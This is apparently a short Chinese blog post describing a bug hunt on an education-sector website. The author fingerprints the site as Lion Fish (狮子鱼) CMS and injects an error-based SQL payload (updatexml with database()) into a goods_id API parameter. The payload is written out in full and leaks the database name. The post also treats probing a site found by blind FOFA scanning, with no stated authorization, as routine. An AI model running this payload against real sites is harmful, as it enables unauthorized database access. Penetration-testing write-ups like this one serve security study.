EDU实战-SQL注入漏洞

复制代码
对于edu来说,是新人挖洞较好的平台,本次记录一次走运的捡漏

0x01 前景

在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点

确认目标身份(使用的quake进行然后去ipc备案查询)

网站后台很像cms搭建的,在查看网站时发现

复制代码
/seller.php?s=/Public/login

狮子鱼cms的特征

直接去百度一手,发现有个SQL注入还有其他的,打算一个一个尝试看看

0x02 尝试挖掘

payload

复制代码
https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)

成功爆破出数据库名

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

点赞+在看支持一下吧~

你的点赞是我更新的动力,免费领取安全学习资料包!

https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq

相关推荐
极限实验室13 分钟前
如何使用 Nginx 代理 Easysearch 服务
数据库·nginx
whn197714 分钟前
selectdb修改表副本
数据库
TDengine (老段)1 小时前
TDengine 中的视图
数据库·物联网·oracle·时序数据库·tdengine·iotdb
Kyrie_Li2 小时前
Redis-Sentinel(哨兵模式)
数据库·redis·sentinel
virelin_Y.lin2 小时前
系统与网络安全------Windows系统安全(9)
windows·web安全·系统安全·iis
计算机毕设定制辅导-无忧学长3 小时前
TDengine 数据写入优化:协议选择与批量操作(一)
网络·数据库·tdengine
Mr.洛 白3 小时前
OpenEuler/CentOS一键部署OpenGauss数据库教程(脚本+视频)
数据库·opengauss·gaussdb·国产数据库安装·安装脚本
计算机毕设定制辅导-无忧学长3 小时前
TDengine 快速上手:安装部署与基础 SQL 实践(一)
大数据·sql·tdengine
炬火初现3 小时前
redis-cpp-cpp如何使用lua脚本
数据库·redis·lua
hxung3 小时前
Redis 数据类型详解
数据库·redis·缓存